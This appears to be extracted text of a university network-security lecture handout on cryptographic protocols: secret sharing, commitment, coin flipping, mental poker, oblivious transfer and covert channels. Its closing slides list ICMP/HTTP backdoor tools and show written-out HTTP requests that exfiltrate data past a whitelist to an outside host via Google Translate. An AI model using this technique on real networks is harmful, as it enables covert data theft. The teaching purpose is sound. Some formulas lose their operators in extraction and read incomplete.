#### Transcript security engineering - University of Sydney

ELEC5616 computer and network security matt barrie [email protected] CNS2010 handout 13 :: crypto protocols II 1 secret splitting Problem: • You are the CEO of Coca-Cola. You are responsible for bringing a refreshing taste to gajillions of people all over the world, but want to keep the recipe secret from Pepsi’s industrial spies. • You could tell your most trusted employees – they could defect to the opposition – they could fall to rubber hose cryptanalysis • How can we split a secret among two parties where each piece by itself is useless? CNS2009 handout 13 :: crypto protocols II 2 secret splitting Simple (XOR) Algorithm: Assume Trent wishes to protect the message m: • Trent generates a random bit string r, the same length m. • Trent computes s = m r • Trent gives Alice r • Trent gives Bob s • • • • Each of the pieces is called a shadow. To reconstruct m, Alice and Bob XOR their shadows together. If r is truly random, the system is perfectly secure (OTP). To extend the scheme to n people, generate n random bit strings e.g. m r s t = u CNS2009 handout 13 :: crypto protocols II 3 secret splitting • Secret splitting aims to enhance reliability without increasing risk through distributing trust. Issues: • The system is adjudicated by Trent – Trent can hand out rubbish and claim it’s part of the secret – He can hand out a piece to Alice, Bob, Carol and Dave, and later tell everyone that only the first three pieces are needed and Dave is fired • All parties know the length of the message – It’s the same length as their piece of the secret • The message is malleable – e.g. Alice can manipulate her shadow to “blind” it or alter bits in a known way (like flipping). • All parties are required to recover message (bus factor = 1) CNS2009 handout 13 :: crypto protocols II 4 secret sharing Problem: • You are responsible for a small third-world country’s nuclear weapons program. • You want to ensure that no single lunatic can launch a missile. • You want to ensure that no two lunatics can collude to launch a missile. • You want at least three of five officers to be lunatics before a missile can be launched. (bus factor = 3) • We call this a (3,5)-threshold scheme. CNS2009 handout 13 :: crypto protocols II 5 shamir’s (t,n)-threshold scheme • • Based on polynomial interpolation, and the fact that a polynomial y=f(x) of degree t-1 is uniquely defined by t points (x,y). Trent wishes to distribute message m amongst n users, where any group of t users can recover m. (bus factor = n-t+1) Setup Trent chooses a prime p > max(m,n) Trent sets a0 = m Trent selects t-1 random, independent coefficients – a1…at-1 (0 ≤ aj ≤ p-1), defining the polynomial f(x) = Σj=0t-1 ajxj Trent computes yi = f(xi) mod p (1 ≤ xi ≤ p-1) – just any random points on the curve Trent sends share (xi,yi) to user i CNS2009 handout 13 :: crypto protocols II 6 shamir’s (t,n)-threshold scheme Pooling of Shares: • Any t users can get together and pool their distinct points – Each party’s (xi, yi) • Since any t points are enough to define the polynomial, the coeffients aj can be computed using Lagrange interpolation. • The message m can be found by the fact that f(0) = a0 = m CNS2009 handout 13 :: crypto protocols II 7 bit commitment Problem: • Alice wants to sell Bob information regarding police informants within his Mafia empire. • Alice doesn’t trust Bob enough to tell him the rats without getting paid first (they might suddenly disappear). • Bob thinks that the deal is a police setup, and won’t give her the money until she commits to names. CNS2009 handout 13 :: crypto protocols II 8 bit commitment Commitment: • Bob → Alice: random r • Alice → Bob: {r|m}k Revelation: • Alice → Bob: k • Bob decrypts the message and verifies r Discussion: • The random value r is used for freshness and to stop Alice from finding two messages where {m}k1 == {m’}k2 – i.e. forcing Alice to commit • Bob does not know k until revelation so cannot brute force the message space CNS2009 handout 13 :: crypto protocols II 9 bit commitment with hash functions Commitment: • Alice: generates random r1, r2 • Alice → Bob: r1 and x = h(r1, r2, m) [x is called a blob] Revelation: • Alice → Bob: r1, r2, m • Bob hashes (r1, r2, m) and compares it to x Discussion: • Bob does not have to send any messages – Alice sends a message to commit and a message to reveal • Alice cannot find r3 such that h(r1, r3, m) == h(r1, r2, m) • The value r2 is kept secret so Bob can’t brute force the message space. CNS2009 handout 13 :: crypto protocols II 10 fair coin flipping Problem: • Alice and Bob are arguing on the Internet over who will be white in a game of online chess . • They agree to flip a coin to resolve the situation. • Alice doesn’t trust Bob to flip the coin. • Bob doesn’t trust Alice to flip the coin. • How can we flip a coin fairly? CNS2009 handout 13 :: crypto protocols II 11 fair coin flipping Solution: • Alice commits to a random bit b using a bit commitment scheme and sends the blob y = f(b) to Bob. • Bob tries to guess the bit. • If Bob guesses correctly then Bob wins the toss. • If Bob guesses incorrectly then Alice wins the toss. Discussion: • The security of the algorithm rests in the security of the function f(x) to generate the blob. • The least significant bit of f(x) cannot correlate with x. – Similar to the reason why we hash the result of the Diffie-Hellman exchange to obtain a session key rather than taking the last n bits. CNS2009 handout 13 :: crypto protocols II 12 fair coin flipping using public key crypto • Requires that the algorithm commutes – e.g. RSA with identical moduli EB(EA(m)) = EA(EB(m)) DA(EB(EA(m))) = EB(m) Algorithm: • Alice and Bob generate public/private key pairs. • Alice generates two random numbers rT, rH • Alice → Bob: m1 = EA(“heads”, rH), m2 = EA(“tails”, rT) • Bob selects one message x at random. • Bob → Alice: EB(EA(x)) • Alice → Bob: DA(EB(EA(x))) = EB(x) • Bob → Alice: x CNS2009 handout 13 :: crypto protocols II 13 fair coin flipping using public key crypto • • Alice verifies that x is one of the two random strings. Alice and Bob reveal to each other their keypairs to ensure that neither cheated. Discussion: • The algorithm is self-enforcing. Either party can detect cheating by the other without a TTP. • Note: Bob learns of the result of the coin flip before Alice. Although he can’t change it, he may delay the result on purpose to take advantage of the situation – • Otherwise known as Bob flipping the coin into a well. Coin flipping has use in session key generation as neither party can influence the result of each flip (i.e. bit) – CNS2009 e.g. in Diffie-Hellman one party selects an exponent after the first. handout 13 :: crypto protocols II 14 mental poker Problem: • Alice and Bob want to play poker over email. • Alice doesn’t trust Bob. • Bob doesn’t trust Alice. • How can Alice and Bob be deal hands fairly? CNS2009 handout 13 :: crypto protocols II 15 mental poker Solution: • Alice and Bob use a commutative public key cryptosystem DA(EB(EA(m))) = EB(m) • • • • • • Alice encrypts 52 messages m1 = (“Ace of Spades”, r1) … using her public key. Alice sends the blobs to Bob. Bob picks 5 of these at random, encrypts with his public key and sends them back to Alice. Alice decrypts the messages with her public key and sends back to Bob. Bob decrypts the messages to determine his hand. At the end of the game, Alice and Bob reveal their key pairs to ensure neither cheats. CNS2009 handout 13 :: crypto protocols II 16 attacks against poker schemes • Since some cryptographic algorithms are not truly random processes, they tend to leak small amounts of information. • In RSA, for example, if the binary representation of the card is a quadratic residue, then the encryption of the card is also a quadratic residue. • Remember that x is a quadratic residue (QR) if y2 ≡ x (mod p) has a solution. • This could be used by a malicious dealer to “mark” some cards (e.g. the Aces). CNS2009 handout 13 :: crypto protocols II 17 oblivious transfer Problem (Kilian): • Bob is trying to factor a 2000-bit number, n. • Alice wants to sell Bob a 1000-bit factor for $1000 (at a very reasonable $1/bit) • Bob only has $500 and offers to buy half the bits- but only if Alice proves that the number is a factor of n, and Alice won’t know which bits Bob bought. • How can the deal be done given, Alice cannot prove that her number is a factor of n without telling it to Bob? CNS2009 handout 13 :: crypto protocols II 18 oblivious transfer Algorithm: • • • • • • • • • Alice generates two public/private key pairs EA1, DA1 and EA2,DA2 Alice → Bob: EA1, EA2 Bob generates a symmetric cypher key, k Bob picks one of Alice’s public keys randomly and encrypts k Bob → Alice: {k}EX Alice decrypts the key twice DA1{k}EX DA2{k}EX resulting in k and garbage DY{k}EX (Alice does not know which is the real key). Alice sends Bob two messages, half the bits each: {“first 500 bits”}, {“second 500 bits”}; each encrypted with one of these keys. Bob decrypts both with k. One message will make sense to him. Bob now has one of the messages. Alice has no idea which one. CNS2009 handout 13 :: crypto protocols II 19 oblivious transfer Discussion: • Alice still needs to convince Bob that the message is a factor of n. She does that using a zero-knowledge proof (remember: a way of Alice telling Bob that she knows x without revealing any information about x). • Obvious transfer is a way Alice can send a bit to Bob in such a way that Bob receives the bit with probability 0.5 and Alice does not know if it is received or not. (i.e. “I have one secret and you get it with probability 0.5”). • This can be extended to “I have two secrets and you get one” “I have n secrets and you get one”, etc. • Obvious transfer is not used alone. It is used as a building block in other protocols. CNS2009 handout 13 :: crypto protocols II 20 subliminal channels Problem: • Alice and Bob have been arrested for conspiracy to factor large numbers by the government. • Alice has been sent to a woman’s jail, Bob to a men’s jail. • The warden, Walter, is willing to let them communicate on the condition that messages are not encrypted. • How can Alice and Bob communicate secretly given Walter might attempt to deceive both of them by planting false messages? CNS2009 handout 13 :: crypto protocols II 21 subliminal channels • Alice and Bob set up a subliminal channel in their message (otherwise known as a covert communications channel). • On the simplest level, Alice and Bob could use steganography aka “stego” (information hiding). Note: stego is not crypto (although you can combine the two). • Examples of this channel might be: – A ‘0’ is sent if the number of words in a sentence is even. – A ‘1’ is sent if the number of words in a sentence is odd. • One might send an image in an email where the low order bit of each pixel is actually a message: – the low order bit is below human perceptual change in quality CNS2009 handout 13 :: crypto protocols II 22 spam mimic • Disguise your message in spam: “Our cover is blown. Abort.” Dear Friend , This letter was specially selected to be sent to you . We will comply with all removal requests ! This mail is being sent in compliance with Senate bill 2016 ; Title 5 ; Section 304 ! This is not a get rich scheme ! Why work for somebody else when you can become rich in 67 WEEKS ! Have you ever noticed people love convenience & the baby boomers are more demanding than their parents ! Well, now is your chance to capitalize on this . WE will help YOU sell more and decrease perceived waiting time by 150% ! The best thing about our system is that it is absolutely risk free for you . But don't believe us . Ms Simpson of North Dakota tried us and says "I've been poor and I've been rich rich is better" . This offer is 100% legal . Because the Internet operates on "Internet time" you must make a commitment soon ! Sign up a friend and your friend will be rich too ! God Bless . Dear Internet user , This letter was specially selected to be sent to you ! We will comply with all removal requests ! This mail is being sent in compliance with Senate bill 1619 , Title 5 ; Section 301 . This is different than anything else you've seen . Why work for somebody else when you can become rich inside 77 WEEKS . Have you ever noticed the baby boomers are more demanding than their parents and nobody is getting any younger . Well, now is your chance to capitalize on this ! WE will help YOU increase customer response by 100% & SELL MORE . The best thing about our system is that it is absolutely risk free for you ! But don't believe us ! Mrs Simpson of Alabama tried us and says "Now I'm rich, Rich, RICH" ! We are a BBB member in good standing . We beseech you - act now ! Sign up a friend and you'll get a discount of 10% ! God Bless . CNS2009 handout 13 :: crypto protocols II 23 subliminal channels • Loki – – • Daemonshell-UDP – • Backdoor emits requests as HTTP Response packets Output from commands return from the slave as cgi script HTTP GETs B0CK – • Reusable tunnel library Messages fragmented to look more like ping packets (multiples of 64 bytes) Rwwwshell – – • ICMP Echo Reply only (more stealthy) ICMP Backdoor – – • Daemon9, Alhambra (phrack/the guild) Bidirectional covert UNIX shell client using the data field in ICMP type 0 (Echo Reply) and type 8 (Echo Request) packets. IGMP multicast messages used as transport AckCmd – CNS2009 TCP ACK packets for request (port 80), TCP RESET packets for response (high port) handout 13 :: crypto protocols II 24 subliminal channels • Covert channels inside TCP (HTTP, HTTPS, MSN) and UDP, communications channels over HTTP cookies! – www.gray-world.net • g00gle CrewBots – Covert communications channel through google CNS2009 handout 13 :: crypto protocols II 25 firesmithing • Quote: Firesmithing started when a customer told us "Dude, don't you think I'm safe ? I disabled HTTP over SSL proxying and setuped a white list of authorized websites my users can HTTP from the internal network. I feel like hackers won't be able to exfiltrate sensitive documents through the web, won't they?“ • Let’s get this straight: – Hosts are whitelisted – Host: headers in HTTP are checked against IP addresses to ensure they are correct – All ports are filtered – Users are forbidden from SSL encrypting their datastreams (to hide what they are doing) – All outgoing connections are filtered (say except for google) • Can we exfiltrate data from the network? CNS2009 handout 13 :: crypto protocols II 26 firesmithing • Unfortunately, yes • When you ask google to translate a web page, it sends a request to fetch it from the remote server, and then translates the content GET http://www.google.com/translate_c?hl=en&ie=UTF8&oe=UTF-8\ &langpair=en%7Ces&u=http://gray-world.net/?Firesmithing HTTP/1.1 Host: www.google.com HTTP/1.1 302 Found Location: http://[IPG00GLE]/translate_c?hl=en&ie=UTF-8&oe=UTF-8\ &langpair=en%7Ces&u=http://gray-world.net/?Firesmithing GET http://[IPG00GLE]/translate_c?hl=en&ie=UTF-8&oe=UTF-8\ &langpair=en%7Ces&u=http://gray-world.net/?Firesmithing HTTP/1.1 Host: www.google.com HTTP/1.1 200 OK Content-Location: http://gray-world.net/ Server: TWS/0.9 [Translated content] [IPG00GLE] is the IP address of a google gateway server CNS2009 handout 13 :: crypto protocols II 27 firesmithing • Logfile //------------------------------------------------------------------\\ [IPG00GLE] - - gray-world.net 193.239.120.148:80 [date]\ "GET /?Firesmithing HTTP/1.0" 200 7863 "-"\ "browser (via translate.google.com)" \\------------------------------------------------------------------// • We have just managed to send “Firesmithing” via google to our remote server • More stuff including using personalised homepages, google calendar, gmail, the cache etc here: – CNS2009 See: http://www.gray-world.net/projects/papers/gbots-1.0.txt handout 13 :: crypto protocols II 28 how do we protect against this? • Start to see the problems with content filtering? • Consider national content filters • Corporate content filters • Net-nannies • What if malware used these techniques to communicate? • Could other internets be layered onto the Internet? – Great firewall of China (and other middle eastern countries) – Australian Government NetAlert – Answer: they do CNS2009 handout 13 :: crypto protocols II 29 references • Handbook of Applied Cryptography – Read § 12.7 - 12.7.2, 12.9 • Spam Mimic – http://www.spammimic.com • Phrack Magazine – www.phrack.org • Gray World – www.gray-world.net CNS2009 handout 13 :: crypto protocols II 30